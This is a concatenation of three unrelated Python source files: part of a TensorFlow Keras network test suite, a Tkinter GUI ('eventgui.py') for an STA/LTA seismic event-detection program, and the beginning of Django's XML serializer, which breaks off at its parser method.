'Model should have its weights created as it '
'has been built')
sample_input = array_ops.ones((1, 10, 10, 1))
output = model(sample_input)
self.assertEqual(output.shape, (1, 3))
@test_util.run_in_graph_and_eager_modes()
def testNoneInShapeWithCompoundModel(self):
class BasicBlock(keras.Model):
def __init__(self):
super(BasicBlock, self).__init__()
self.conv1 = keras.layers.Conv2D(8, 3)
self.pool = keras.layers.GlobalAveragePooling2D()
self.dense = keras.layers.Dense(3)
def call(self, x):
x = self.conv1(x)
x = self.pool(x)
x = self.dense(x)
return x
class CompoundModel(keras.Model):
def __init__(self):
super(CompoundModel, self).__init__()
self.block = BasicBlock()
def call(self, x):
x = self.block(x) # pylint: disable=not-callable
return x
model = CompoundModel()
model.build(tensor_shape.TensorShape((None, None, None, 1)))
self.assertTrue(model.built, 'Model should be built')
self.assertTrue(model.weights,
'Model should have its weights created as it '
'has been built')
sample_input = array_ops.ones((1, 10, 10, 1))
output = model(sample_input) # pylint: disable=not-callable
self.assertEqual(output.shape, (1, 3))
@test_util.run_in_graph_and_eager_modes()
def testNoneInShapeWithFunctinalAPI(self):
class BasicBlock(keras.Model):
# Inherting from keras.layers.Layer since we are calling this layer
# inside a model created using functional API.
def __init__(self):
super(BasicBlock, self).__init__()
self.conv1 = keras.layers.Conv2D(8, 3)
def call(self, x):
x = self.conv1(x)
return x
input_layer = keras.layers.Input(shape=(None, None, 1))
x = BasicBlock()(input_layer)
x = keras.layers.GlobalAveragePooling2D()(x)
output_layer = keras.layers.Dense(3)(x)
model = keras.Model(inputs=input_layer, outputs=output_layer)
model.build(tensor_shape.TensorShape((None, None, None, 1)))
self.assertTrue(model.built, 'Model should be built')
self.assertTrue(model.weights,
'Model should have its weights created as it '
'has been built')
sample_input = array_ops.ones((1, 10, 10, 1))
output = model(sample_input)
self.assertEqual(output.shape, (1, 3))
@keras_parameterized.run_all_keras_modes
def test_sequential_as_downstream_of_masking_layer(self):
inputs = keras.layers.Input(shape=(3, 4))
x = keras.layers.Masking(mask_value=0., input_shape=(3, 4))(inputs)
s = keras.Sequential()
s.add(keras.layers.Dense(5, input_shape=(4,)))
x = keras.layers.wrappers.TimeDistributed(s)(x)
model = keras.Model(inputs=inputs, outputs=x)
model.compile(
optimizer='rmsprop',
loss='mse',
run_eagerly=testing_utils.should_run_eagerly())
model_input = np.random.randint(
low=1, high=5, size=(10, 3, 4)).astype('float32')
for i in range(4):
model_input[i, i:, :] = 0.
model.fit(model_input,
np.random.random((10, 3, 5)), epochs=1, batch_size=6)
if not context.executing_eagerly():
# Note: this doesn't work in eager due to DeferredTensor/ops compatibility
# issue.
mask_outputs = [model.layers[1].compute_mask(model.layers[1].input)]
mask_outputs += [model.layers[2].compute_mask(
model.layers[2].input, mask_outputs[-1])]
func = keras.backend.function([model.input], mask_outputs)
mask_outputs_val = func([model_input])
self.assertAllClose(mask_outputs_val[0], np.any(model_input, axis=-1))
self.assertAllClose(mask_outputs_val[1], np.any(model_input, axis=-1))
@test_util.run_in_graph_and_eager_modes()
def test_external_keras_serialization_compat_input_layers(self):
inputs = keras.Input(shape=(10,))
outputs = keras.layers.Dense(1)(inputs)
model = keras.Model(inputs, outputs)
config = model.get_config()
# Checks that single inputs and outputs are still saved as 1-element lists.
# Saving as 1-element lists or not is equivalent in TF Keras, but only the
# 1-element list format is supported in TF.js and keras-team/Keras.
self.assertLen(config['input_layers'], 1)
self.assertLen(config['output_layers'], 1)
@test_util.run_in_graph_and_eager_modes()
def test_external_keras_serialization_compat_inbound_nodes(self):
# Check single Tensor input.
inputs = keras.Input(shape=(10,), name='in')
outputs = keras.layers.Dense(1)(inputs)
model = keras.Model(inputs, outputs)
config = model.get_config()
self.assertEqual(config['layers'][1]['inbound_nodes'], [[['in', 0, 0, {}]]])
# Check multiple Tensor input.
inputs1 = keras.Input(shape=(10,), name='in1')
inputs2 = keras.Input(shape=(10,), name='in2')
outputs = keras.layers.Add()([inputs1, inputs2])
model = keras.Model([inputs1, inputs2], outputs)
config = model.get_config()
self.assertEqual(config['layers'][2]['inbound_nodes'],
[[['in1', 0, 0, {}], ['in2', 0, 0, {}]]])
class GraphUtilsTest(test.TestCase):
@test_util.run_deprecated_v1
def testGetReachableFromInputs(self):
with self.cached_session():
pl_1 = array_ops.placeholder(shape=None, dtype='float32')
pl_2 = array_ops.placeholder(shape=None, dtype='float32')
pl_3 = array_ops.placeholder(shape=None, dtype='float32')
x_1 = pl_1 + pl_2
x_2 = pl_2 * 2
x_3 = pl_3 + 1
x_4 = x_1 + x_2
x_5 = x_3 * pl_1
self.assertEqual(
keras.utils.tf_utils.get_reachable_from_inputs([pl_1]),
{pl_1, x_1, x_4, x_5, x_1.op, x_4.op, x_5.op})
self.assertEqual(
keras.utils.tf_utils.get_reachable_from_inputs([pl_1, pl_2]),
{pl_1, pl_2, x_1, x_2, x_4, x_5, x_1.op, x_2.op, x_4.op, x_5.op})
self.assertEqual(
keras.utils.tf_utils.get_reachable_from_inputs([pl_3]),
{pl_3, x_3, x_5, x_3.op, x_5.op})
self.assertEqual(
keras.utils.tf_utils.get_reachable_from_inputs([x_3]),
{x_3, x_5, x_5.op})
@test_util.run_all_in_graph_and_eager_modes
class NestedNetworkTest(test.TestCase):
def test_nested_inputs_network(self):
inputs = {'x1': keras.Input(shape=(1,)), 'x2': keras.Input(shape=(1,))}
outputs = keras.layers.Add()([inputs['x1'], inputs['x2']])
network = keras.engine.network.Network(inputs, outputs)
network = keras.engine.network.Network.from_config(network.get_config())
result_tensor = network({
'x': array_ops.ones((1, 1), 'float32'),
'y': array_ops.ones((1, 1), 'float32')
})
result = self.evaluate(result_tensor)
self.assertAllEqual(result, [[2.]])
# TODO(b/122726584): Investigate why concrete batch is flaky in some builds.
output_shape = network.compute_output_shape({
'x1': (None, 1),
'x2': (None, 1)
})
self.assertListEqual(output_shape.as_list(), [None, 1])
def test_nested_outputs_network(self):
inputs = keras.Input(shape=(1,))
outputs = {
'x+x': keras.layers.Add()([inputs, inputs]),
'x*x': keras.layers.Multiply()([inputs, inputs])
}
network = keras.engine.network.Network(inputs, outputs)
network = keras.engine.network.Network.from_config(network.get_config())
result_tensor = network(array_ops.ones((1, 1), 'float32'))
result = self.evaluate(result_tensor)
self.assertAllEqual(result['x+x'], [[2.]])
self.assertAllEqual(result['x*x'], [[1.]])
output_shape = network.compute_output_shape((None, 1))
self.assertListEqual(output_shape['x+x'].as_list(), [None, 1])
self.assertListEqual(output_shape['x*x'].as_list(), [None, 1])
def test_nested_network_inside_network(self):
inner_inputs = {
'x1': keras.Input(shape=(1,)),
'x2': keras.Input(shape=(1,))
}
inner_outputs = {
'x1+x2':
keras.layers.Add()([inner_inputs['x1'], inner_inputs['x2']]),
'x1*x2':
keras.layers.Multiply()([inner_inputs['x1'], inner_inputs['x2']])
}
inner_network = keras.engine.network.Network(inner_inputs, inner_outputs)
inputs = [keras.Input(shape=(1,)), keras.Input(shape=(1,))]
middle = inner_network({'x1': inputs[0], 'x2': inputs[1]})
outputs = keras.layers.Add()([middle['x1+x2'], middle['x1*x2']])
network = keras.engine.network.Network(inputs, outputs)
network = keras.engine.network.Network.from_config(network.get_config())
# Computes: `(x1+x2) + (x1*x2)`
result_tensor = network(
[array_ops.ones((1, 1), 'float32'),
array_ops.ones((1, 1), 'float32')])
result = self.evaluate(result_tensor)
self.assertAllEqual(result, [[3.]])
output_shape = network.compute_output_shape([(None, 1), (None, 1)])
self.assertListEqual(output_shape.as_list(), [None, 1])
@test_util.run_in_graph_and_eager_modes
def test_updates_with_direct_call(self):
inputs = keras.Input(shape=(10,))
x = keras.layers.BatchNormalization()(inputs)
x = keras.layers.Dense(10)(x)
model = keras.Model(inputs, x)
ph = keras.backend.placeholder(shape=(10, 10))
model(ph)
self.assertLen(model.get_updates_for(ph), 2)
self.assertLen(model.get_updates_for(None), 0)
@keras_parameterized.run_all_keras_modes
class AddLossTest(keras_parameterized.TestCase):
def test_add_loss_outside_call_only_loss(self):
inputs = keras.Input((10,))
mid = keras.layers.Dense(10)(inputs)
outputs = keras.layers.Dense(1)(mid)
model = keras.Model(inputs, outputs)
model.add_loss(math_ops.reduce_mean(outputs))
self.assertLen(model.losses, 1)
initial_weights = model.get_weights()
x = np.ones((10, 10))
model.compile('sgd', run_eagerly=testing_utils.should_run_eagerly())
model.fit(x, batch_size=2, epochs=1)
model2 = model.from_config(model.get_config())
model2.compile('sgd', run_eagerly=testing_utils.should_run_eagerly())
model2.set_weights(initial_weights)
model2.fit(x, batch_size=2, epochs=1)
# The TFOpLayer and the AddLoss layer are serialized.
self.assertLen(model2.layers, 5)
self.assertAllClose(model.get_weights(), model2.get_weights())
def test_add_loss_outside_call_multiple_losses(self):
inputs = keras.Input((10,))
x1 = keras.layers.Dense(10)(inputs)
x2 = keras.layers.Dense(10)(x1)
outputs = keras.layers.Dense(1)(x2)
model = keras.Model(inputs, outputs)
model.add_loss(math_ops.reduce_sum(x1 * x2))
model.add_loss(math_ops.reduce_mean(outputs))
self.assertLen(model.losses, 2)
initial_weights = model.get_weights()
x, y = np.ones((10, 10)), np.ones((10, 1))
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
model.fit(x, y, batch_size=2, epochs=1)
model2 = model.from_config(model.get_config())
model2.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
model2.set_weights(initial_weights)
model2.fit(x, y, batch_size=2, epochs=1)
self.assertAllClose(model.get_weights(), model2.get_weights())
@keras_parameterized.run_all_keras_modes
class WeightAccessTest(keras_parameterized.TestCase):
def test_functional_model(self):
inputs = keras.Input((10,))
x1 = keras.layers.Dense(10)(inputs)
x2 = keras.layers.Dense(10)(x1)
outputs = keras.layers.Dense(1)(x2)
model = keras.Model(inputs, outputs)
self.assertEqual(len(model.weights), 6)
def test_sequential_model_with_input_shape(self):
x1 = keras.layers.Dense(10, input_shape=(10,))
x2 = keras.layers.Dense(10)
x3 = keras.layers.Dense(1)
model = keras.models.Sequential([x1, x2, x3])
self.assertEqual(len(model.weights), 6)
def test_sequential_model_without_input_shape(self):
x1 = keras.layers.Dense(10)
x2 = keras.layers.Dense(10)
x3 = keras.layers.Dense(1)
model = keras.models.Sequential([x1, x2, x3])
with self.assertRaisesRegexp(
ValueError, 'Weights for model .* have not yet been created'):
_ = model.weights
def test_subclass_model_with_build_method(self):
class SubclassModel(keras.models.Model):
def build(self, input_shape):
self.w = self.add_weight(shape=input_shape[-1], initializer='ones')
def call(self, inputs):
return inputs * self.w
model = SubclassModel()
with self.assertRaisesRegexp(
ValueError, 'Weights for model .* have not yet been created'):
_ = model.weights
model(keras.Input((10,)))
self.assertEqual(len(model.weights), 1)
def test_subclass_model_without_build_method(self):
class SubclassModel(keras.models.Model):
def __init__(self):
super(SubclassModel, self).__init__()
self.w = self.add_weight(shape=(), initializer='ones')
def call(self, inputs):
return inputs * self.w
model = SubclassModel()
self.assertEqual(len(model.weights), 1)
if __name__ == '__main__':
test.main()
| |
'''eventgui.py -- gui for programstalta.py
usage: python eventgui.py [options]
options:
-h print this
-t ttktheme use theme ttktheme [alt]
-l list available themes and exit
'''
version = "1.10"
lastchangedate = "2014-12-26"
import sys
import getopt
import posixpath as pp
import pprint
from Tkinter import *
import ttk
import tkFont
import tkFileDialog
import tkMessageBox
import base
from serialports import serialports
from logger import log
from programstalta import main as pgmmain
from programstalta import version as pgmversion
def force_suffix(fname, suffix):
"""won't suffix a directory.
second argument should not start with a period."""
head, tail = pp.split(fname)
if len(tail) == 0:
return head
if suffix[0] == ".":
suffix = suffix[1:]
fpart, fext = pp.splitext(tail)
newp = pp.join(head, fpart + "." + suffix)
return pp.normpath(newp)
class App(object):
def __init__(self, theme):
self.root = Tk()
master = ttk.Frame(self.root)
self.frame = master
master.pack(expand=True, fill='both')
deff = tkFont.Font(size = 14, weight = tkFont.BOLD)
hedf = tkFont.Font(size = 16, weight = tkFont.BOLD)
entf = tkFont.Font(size = 14, slant = tkFont.ITALIC,
weight = tkFont.BOLD)
lblf = tkFont.Font(size = 12, weight = tkFont.BOLD)
btnf = tkFont.Font(size = 12, slant = tkFont.ITALIC,
weight = tkFont.BOLD)
abtnf = tkFont.Font(size = 14, weight = tkFont.BOLD)
opnf = tkFont.Font(size = 14, slant = tkFont.ITALIC)
ckbf = tkFont.Font(size = 12, weight = tkFont.BOLD)
lblfg = "darkblue"
hlblfg = "#60232E"
vlblfg = "darkblue"
ulblfg = "#45232E"
btnfg = "#45442E"
qbtnfg = "#bb232E"
entbg = "lightgray"
entfg = "darkblue"
ckbfg = "blue"
sty = ttk.Style()
sty.theme_use(theme)
sty.configure('.',
font = deff)
sty.configure("head.TLabel",
font = hedf,
foreground = hlblfg,
relief = RAISED,
width = 30,
sticky = "w")
sty.configure("TLabel",
font = lblf,
foreground = lblfg,
sticky = "w")
sty.configure("var.TLabel",
font = lblf,
foreground = vlblfg,
sticky = "e")
sty.configure("unit.TLabel",
font = lblf,
foreground = ulblfg,
sticky = W)
sty.configure("TButton",
font = btnf,
foreground = btnfg,
)
sty.configure("r.TButton",
foreground = "blue",
font = abtnf)
sty.configure("f.TButton",
foreground = "magenta",
font = abtnf)
sty.configure("q.TButton",
foreground = qbtnfg,
font = abtnf)
sty.configure("sl.TButton",
foreground = "#ff0000",
font = abtnf)
sty.configure("TEntry",
font = entf,
foreground = entfg,
background = entbg,
sticky = "ew",
width = 40,
)
sty.configure("TCheckbutton",
foreground = ckbfg,
font = ckbf,
)
sty.configure("TOptionMenu",
font = opnf,
foreground = entfg,
background = entbg,
)
base.Globs["predatacallback"] = master.update
base.Globs["version"] = "%.2f" % (float(version) + float(pgmversion))
self.root.title("sta/lta event detection"
+ " version " + base.Globs["version"]
+ " "
+ " [gui " + version
+ " algorithm " + pgmversion + "]"
+ " "
+ "theme: " + theme)
self.truedatafile = ""
self.statefile = ""
self.isrunning = False
row = 0
row += 1
lb = ttk.Label(master, text = "processing parameters",
style = "head.TLabel")
lb.grid(row = row, column = 3, columnspan = 2)
ttk.Label(master, text = " ").grid(row = row, column = 6, padx = 50)
row += 1
lb = ttk.Label(master, text = "Tsta ", style = "var.TLabel")
lb.grid(row = row, column = 3, sticky = E)
self.Tsta = StringVar(master, "0.25")
ttk.Entry(master, textvariable = self.Tsta
).grid(row = row, column = 4, sticky = E + W)
ttk.Label(master, text = " short time average window"
).grid(row = row, column = 5, sticky = W)
ttk.Label(master, text = "secs", style = "unit.TLabel"
).grid(row = row, column = 6, sticky = W)
row += 1
ttk.Label(master, text = "Tlta ", style = "var.TLabel"
).grid(row = row, column = 3, sticky = E)
self.Tlta = StringVar()
self.Tlta.set("90.0")
ttk.Entry(master, textvariable = self.Tlta
).grid(row = row, column = 4, sticky = E + W)
ttk.Label(master, text = " long time average window",
).grid(row = row, column = 5, sticky = W)
ttk.Label(master, text = "secs", style = "unit.TLabel"
).grid(row = row, column = 6, sticky = W)
row += 1
ttk.Label(master, text = "Trigger ", style = "var.TLabel"
).grid(row = row, column = 3, sticky = E)
self.Triggerthreshold = StringVar()
self.Triggerthreshold.set("5.0")
ttk.Entry(master, textvariable = self.Triggerthreshold
).grid(row = row, column = 4, sticky = E + W)
ttk.Label(master, text = " sta/lta trigger level"
).grid(row = row, column = 5, sticky = W)
ttk.Label(master, text = "ratio", style = "unit.TLabel",
).grid(row = row, column = 6, sticky = W)
row += 1
ttk.Label(master, text = "Detrigger ", style = "var.TLabel",
).grid(row = row, column = 3, sticky = E)
self.Detriggerthreshold = StringVar()
self.Detriggerthreshold.set("2.0")
ttk.Entry(master, textvariable = self.Detriggerthreshold
).grid(row = row, column = 4, sticky = E + W)
ttk.Label(master, text = " sta/lta de-trigger level"
).grid(row = row, column = 5, sticky = W)
ttk.Label(master, text = "ratio", style = "unit.TLabel",
).grid(row = row, column = 6, sticky = W)
row += 1
ttk.Label(master, text = "Trigduration ", style = "var.TLabel",
).grid(row = row, column = 3, sticky = E)
self.Trigduration = StringVar()
self.Trigduration.set("30.0")
ttk.Entry(master, textvariable = self.Trigduration,
).grid(row = row, column = 4, sticky = E + W)
ttk.Label(master, text = " post-trigger event duration"
).grid(row = row, column = 5, sticky = W)
ttk.Label(master, text = "secs", style = "unit.TLabel",
).grid(row = row, column = 6, sticky = W)
row += 1
ttk.Label(master, text = "Trigdesense ", style = "var.TLabel",
).grid(row = row, column = 3, sticky = E)
self.Trigdsensetime = StringVar()
self.Trigdsensetime.set("0.0")
ttk.Entry(master, textvariable = self.Trigdsensetime,
).grid(row = row, column = 4, sticky = E + W)
ttk.Label(master, text = " lta desense time scale"
).grid(row = row, column = 5, sticky = W)
ttk.Label(master, text = "secs", style = "unit.TLabel",
).grid(row = row, column = 6, sticky = W)
row += 1
ttk.Label(master, text = " ").grid(row = row, column = 3, sticky = W)
row += 1
ttk.Label(master, text = "logging parameters", style = "head.TLabel",
).grid(row = row, column = 3, columnspan = 2)
row += 1
ttk.Label(master, text = "Loglevel ", style = "var.TLabel",
).grid(row = row, column = 3, sticky = E)
self.Loglevelsel = StringVar()
self.Loglevelsel.set("debug")
self.llb = ttk.OptionMenu(master, self.Loglevelsel,
"debug", "debug", "info", "warning", "error")
self.llb.grid(row = row, column = 4, sticky = E + W)
ttk.Label(master, text = " logging level"
).grid(row = row, column = 5, sticky = W)
row += 1
ttk.Label(master, text = "Logfile ", style = "var.TLabel",
).grid(row = row, column = 3, sticky = E)
self.Logfile = StringVar()
self.Logfile.set("")
ttk.Entry(master, textvariable = self.Logfile
).grid(row = row, column = 4, sticky = E + W)
ttk.Label(master, text = " log (txt) filename"
).grid(row = row, column = 5, sticky = W)
row += 1
self.Outfile = StringVar()
self.Outfile.set("")
self.Outshowfile = StringVar()
self.Outshowfile.set("")
ttk.Button(master, text = "specify output file",
command = self.OnOutBrowse,
).grid(row = row, column = 3, sticky = E, padx = 4)
ttk.Entry(master, textvariable = self.Outshowfile
).grid(row = row, column = 4, sticky = E + W)
ttk.Label(master, text = " data (sac) filename"
).grid(row = row, column = 5, sticky = W)
row += 1
ttk.Label(master, text = "Eventfile ", style = "var.TLabel",
).grid(row = row, column = 3, sticky = E)
self.Eventfile = StringVar()
self.Eventfile.set("")
ttk.Entry(master, textvariable = self.Eventfile
).grid(row = row, column = 4, sticky = E + W)
ttk.Label(master, text = " event (xlsx) filename"
).grid(row = row, column = 5, sticky = W)
row += 1
ttk.Label(master, text = " ").grid(row = row, column = 3, sticky = W)
row += 1
ttk.Label(master, text = "control parameters", style = "head.TLabel",
).grid(row = row, column = 3, columnspan = 2)
row += 1
ttk.Label(master, text = "Jobduration ", style = "var.TLabel",
).grid(row = row, column = 3, sticky = E)
self.Jobduration = StringVar()
self.Jobduration.set("")
ttk.Entry(master, textvariable = self.Jobduration
).grid(row = row, column = 4, sticky = E + W)
ttk.Label(master, text = " acquisition duration"
).grid(row = row, column = 5, sticky = W)
ttk.Label(master, text = "secs", style = "unit.TLabel",
).grid(row = row, column = 6, sticky = W)
row += 1
self.Doalarm = IntVar()
ckb = ttk.Checkbutton(master, text = "event alarm ",
variable = self.Doalarm)
ckb.grid(row = row, column = 3, sticky = E)
self.Alarmduration = StringVar()
self.Alarmduration.set("2.0")
ent = ttk.Entry(master, textvariable = self.Alarmduration)
ent.grid(row = row, column = 4, sticky = E + W)
lbl = ttk.Label(master, text = " alarm duration")
lbl.grid(row = row, column = 5, sticky = W)
lbl = ttk.Label(master, text = "secs", style = "unit.TLabel")
lbl.grid(row = row, column = 6, sticky = W)
row += 1
lbl = ttk.Label(master, text = " ")
lbl.grid(row = row, column = 3, sticky = W)
row += 1
lbl = ttk.Label(master, text = "data source", style = "head.TLabel")
lbl.grid(row = row, column = 3, columnspan = 2)
row += 1
self.Comcheck = IntVar()
ckb = ttk.Checkbutton(master, text = "use comport",
variable = self.Comcheck)
ckb.grid(row = row, column = 3, sticky = E)
comportlist = []
for name, desc, hwid in serialports():
comportlist.append(name)
if len(comportlist) == 0:
comportlist = ["-none-", ]
self.comport = StringVar()
self.comport.set(comportlist[0])
self.ports = ttk.OptionMenu(master, self.comport, comportlist[-1],
*comportlist)
self.ports.grid(row = row, column = 4, sticky = E + W)
lbl = ttk.Label(master, text = " active comport")
lbl.grid(row = row, column = 5, sticky = W)
row += 1
self.datafile = StringVar()
self.datafile.set("")
self.truedatafile = StringVar()
self.truedatafile.set("")
btn = ttk.Button(master, text = "select input file",
command = self.OnBrowse)
btn.grid(row = row, column = 3, sticky = E, padx = 4)
lbl = ttk.Label(master, text = " input (sac) file")
lbl.grid(row = row, column = 5, sticky = W)
ent = ttk.Entry(master, textvariable = self.datafile)
ent.grid(row = row, column = 4, sticky = E + W)
row += 1
lbl = ttk.Label(master, text = " ")
lbl.grid(row = row, column = 3, sticky = W)
row += 1
lbl = ttk.Label(master, text = "display control",
style = "head.TLabel")
lbl.grid(row = row, column = 3, columnspan = 2, sticky = E + W)
row += 1
self.doplot = IntVar()
ckb = ttk.Checkbutton(master, text = "plot results",
variable = self.doplot)
ckb.grid(row = row, column = 3, columnspan = 2, sticky = W)
row += 1
self.doplotavg = IntVar()
ckb = ttk.Checkbutton(master, text = "show running averages",
variable = self.doplotavg)
ckb.grid(row = row, column = 3, columnspan = 2, sticky = W,
padx = 20)
row += 1
self.doploty = IntVar()
ckb = ttk.Checkbutton(master, text = "show trace",
variable = self.doploty)
ckb.grid(row = row, column = 3, columnspan = 2, sticky = W,
padx = 20)
row += 1
self.doploth = IntVar()
ckb = ttk.Checkbutton(master, text = "plot histograms",
variable = self.doploth)
ckb.grid(row = row, column = 3, columnspan = 2, sticky = W,
padx = 20)
row += 1
self.showcommand = IntVar()
ckb = ttk.Checkbutton(master, text = "show command line (debug)",
variable = self.showcommand)
ckb.grid(row = row, column = 3, columnspan = 2, sticky = W)
row += 1
ttk.Label(master, text = " ").grid(row = row, column = 3, sticky = W)
row += 1
col = 3
self.runb = ttk.Button(master, text = "run", style = "r.TButton",
command = self.OnRun)
self.runb.grid(row = row, column = col, sticky = N)
col += 1
self.finishb = ttk.Button(master, text = "finish",
style = "f.TButton",
command = self.OnFinish)
self.finishb.grid(row = row, column = col, sticky = N)
self.finishb.state(("disabled",))
col += 1
savb = ttk.Button(master, text = "save", command = self.saveState,
style = "sl.TButton")
savb.grid(row = row, column = col, sticky = N)
savb.state(("disabled",))
col += 1
loadb = ttk.Button(master, text = "load", command = self.loadState,
style = "sl.TButton")
loadb.grid(row = row, column = col, sticky = W)
loadb.state(("disabled",))
col += 1
btn = ttk.Button(master, text = "quit", style = "q.TButton",
command = self.OnQuit)
btn.grid(row = row, column = col, sticky = N)
col += 1
lbl = ttk.Label(master, text = " ")
lbl.grid(row = row, column = col, sticky = W)
def OnRun(self):
args = [
"eventgui",
"-g",
"-S", self.Tsta.get(),
"-L", self.Tlta.get(),
"-T", self.Triggerthreshold.get(),
"-D", self.Detriggerthreshold.get(),
"-P", self.Trigduration.get(),
"-F", self.Trigdsensetime.get(),
"-A", self.Alarmduration.get(),
"-l", self.Loglevelsel.get(),
"-m",
]
if self.Logfile.get() != "":
args.extend(("-w", force_suffix(self.Logfile.get(), "txt")))
if self.Outfile.get() != "":
args.extend(("-s", force_suffix(self.Outfile.get(), "sac")))
elif self.Outshowfile.get() != "":
args.extend(("-s", force_suffix(self.Outshowfile.get(), "sac")))
if self.Eventfile.get() != "":
args.extend(("-e", force_suffix(self.Eventfile.get(), "xlsx")))
if (self.doplot.get() or self.doplotavg.get()
or self.doploty.get() or self.doploth.get()):
args.append("-p")
if self.doplotavg.get():
args.append("-r")
if self.doploty.get():
args.append("-y")
if self.doploth.get():
args.append("-d")
if not self.Doalarm.get():
args.append("-q")
if self.Comcheck.get() == 0:
args.append("-q")
if self.truedatafile.get() != "":
args.append(self.truedatafile.get())
elif self.datafile.get() != "":
args.append(self.datafile.get())
else:
tkMessageBox.showerror(title = "no data source",
message = "check 'use comport' or provide a data file")
return
else:
if self.comport.get() != "-none-":
args.extend(("-c", self.comport.get()))
if self.Jobduration.get() != "":
args.extend(("-i", self.Jobduration.get()))
else:
tkMessageBox.showerror(title = "no available serial port",
message = "you must choose a data file")
self.Comcheck.set(0)
return
if self.showcommand.get():
print >> sys.stderr, "--------command line-----------"
pprint.pprint(args, stream = sys.stderr)
print >> sys.stderr, "-------------------------------"
base.Globs["quitflag"] = False
base.Globs["finishflag"] = False
self.runb.state(("disabled",))
self.finishb.state(("!disabled",))
self.isrunning = True
r = pgmmain(args)
self.isrunning = False
self.finishb.state(("disabled",))
self.runb.state(("!disabled",))
if r != 0:
log().error("pgmmain returned %s" % r)
self.reallyquit()
if base.Globs["quitflag"]:
log().debug("quitting on global quitflag")
self.reallyquit()
base.Globs["quitflag"] = True
base.Globs["finishflag"] = True
def OnOutBrowse(self):
self.Outfile.set(tkFileDialog.asksaveasfilename(
filetypes = [('sac data file', '*.sac')]))
if self.Outfile.get() != "":
self.Outshowfile.set(pp.basename(self.Outfile.get()))
def OnBrowse(self):
self.truedatafile.set(tkFileDialog.askopenfilename())
if self.truedatafile.get() != "":
self.datafile.set(pp.basename(self.truedatafile.get()))
def loadState(self):
pass
def saveState(self):
pass
def reallyquit(self):
self.frame.quit()
def OnFinish(self):
base.Globs["finishflag"] = True
def OnQuit(self):
if not self.isrunning:
self.reallyquit()
if base.Globs["quitflag"]:
self.reallyquit()
base.Globs["quitflag"] = True
def main(argv=None):
if argv is None:
argv = sys.argv
options = "ht:l"
theme = "alt"
list_all = False
try:
try:
opts, datafiles = getopt.getopt(argv[1:], options, ["help"])
except getopt.error, msg:
raise Usage(msg)
# process options
for o, a in opts:
if o in ("-h", "--help"):
print __doc__ + "\nversion: " + version
sys.exit(0)
elif o == "-l":
list_all = True
elif o == "-t":
theme = a
else:
print "unknown argument: " + a
print __doc__ + "\nversion: " + version
sys.exit(1)
if list_all:
style = ttk.Style()
print "available themes:"
for t in style.theme_names():
print " " + t
return 0
app = App(theme)
app.root.mainloop()
try:
app.root.destroy()
except:
pass
except Exception, e:
log().exception("gui error")
print >> sys.stderr, e
return 3
if __name__ == "__main__":
sys.exit(main())
| |
"""
XML serializer.
"""
from xml.dom import pulldom
from xml.sax import handler
from xml.sax.expatreader import ExpatParser as _ExpatParser
from django.apps import apps
from django.conf import settings
from django.core.serializers import base
from django.db import DEFAULT_DB_ALIAS, models
from django.utils.xmlutils import (
SimplerXMLGenerator, UnserializableContentError,
)
class Serializer(base.Serializer):
"""Serialize a QuerySet to XML."""
def indent(self, level):
if self.options.get('indent') is not None:
self.xml.ignorableWhitespace(
'\n' + ' ' * self.options.get('indent') * level)
def start_serialization(self):
"""
Start serialization -- open the XML document and the root element.
"""
self.xml = SimplerXMLGenerator(self.stream, self.options.get(
"encoding", settings.DEFAULT_CHARSET))
self.xml.startDocument()
self.xml.startElement("django-objects", {"version": "1.0"})
def end_serialization(self):
"""
End serialization -- end the document.
"""
self.indent(0)
self.xml.endElement("django-objects")
self.xml.endDocument()
def start_object(self, obj):
"""
Called as each object is handled.
"""
if not hasattr(obj, "_meta"):
raise base.SerializationError(
"Non-model object (%s) encountered during serialization" % type(obj))
self.indent(1)
attrs = {'model': str(obj._meta)}
if not self.use_natural_primary_keys or not hasattr(obj, 'natural_key'):
obj_pk = obj.pk
if obj_pk is not None:
attrs['pk'] = str(obj_pk)
self.xml.startElement("object", attrs)
def end_object(self, obj):
"""
Called after handling all fields for an object.
"""
self.indent(1)
self.xml.endElement("object")
def handle_field(self, obj, field):
"""
Handle each field on an object (except for ForeignKeys and
ManyToManyFields).
"""
self.indent(2)
self.xml.startElement('field', {
'name': field.name,
'type': field.get_internal_type(),
})
# Get a "string version" of the object's data.
if getattr(obj, field.name) is not None:
try:
self.xml.characters(field.value_to_string(obj))
except UnserializableContentError:
raise ValueError("%s.%s (pk:%s) contains unserializable characters" % (
obj.__class__.__name__, field.name, obj.pk))
else:
self.xml.addQuickElement("None")
self.xml.endElement("field")
def handle_fk_field(self, obj, field):
"""
Handle a ForeignKey (they need to be treated slightly
differently from regular fields).
"""
self._start_relational_field(field)
related_att = getattr(obj, field.get_attname())
if related_att is not None:
if self.use_natural_foreign_keys and hasattr(field.remote_field.model, 'natural_key'):
related = getattr(obj, field.name)
# If related object has a natural key, use it
related = related.natural_key()
# Iterable natural keys are rolled out as subelements
for key_value in related:
self.xml.startElement("natural", {})
self.xml.characters(str(key_value))
self.xml.endElement("natural")
else:
self.xml.characters(str(related_att))
else:
self.xml.addQuickElement("None")
self.xml.endElement("field")
def handle_m2m_field(self, obj, field):
"""
Handle a ManyToManyField. Related objects are only serialized as
references to the object's PK (i.e. the related *data* is not dumped,
just the relation).
"""
if field.remote_field.through._meta.auto_created:
self._start_relational_field(field)
if self.use_natural_foreign_keys and hasattr(field.remote_field.model, 'natural_key'):
# If the objects in the m2m have a natural key, use it
def handle_m2m(value):
natural = value.natural_key()
# Iterable natural keys are rolled out as subelements
self.xml.startElement("object", {})
for key_value in natural:
self.xml.startElement("natural", {})
self.xml.characters(str(key_value))
self.xml.endElement("natural")
self.xml.endElement("object")
else:
def handle_m2m(value):
self.xml.addQuickElement("object", attrs={
'pk': str(value.pk)
})
for relobj in getattr(obj, field.name).iterator():
handle_m2m(relobj)
self.xml.endElement("field")
def _start_relational_field(self, field):
"""Output the <field> element for relational fields."""
self.indent(2)
self.xml.startElement('field', {
'name': field.name,
'rel': field.remote_field.__class__.__name__,
'to': str(field.remote_field.model._meta),
})
class Deserializer(base.Deserializer):
"""Deserialize XML."""
def __init__(self, stream_or_string, *, using=DEFAULT_DB_ALIAS, ignorenonexistent=False, **options):
super().__init__(stream_or_string, **options)
self.event_stream = pulldom.parse(self.stream, self._make_parser())
self.db = using
self.ignore = ignorenonexistent
def _make_parser(self):
"""Create a hardened XML parser (no custom/external entities)."""
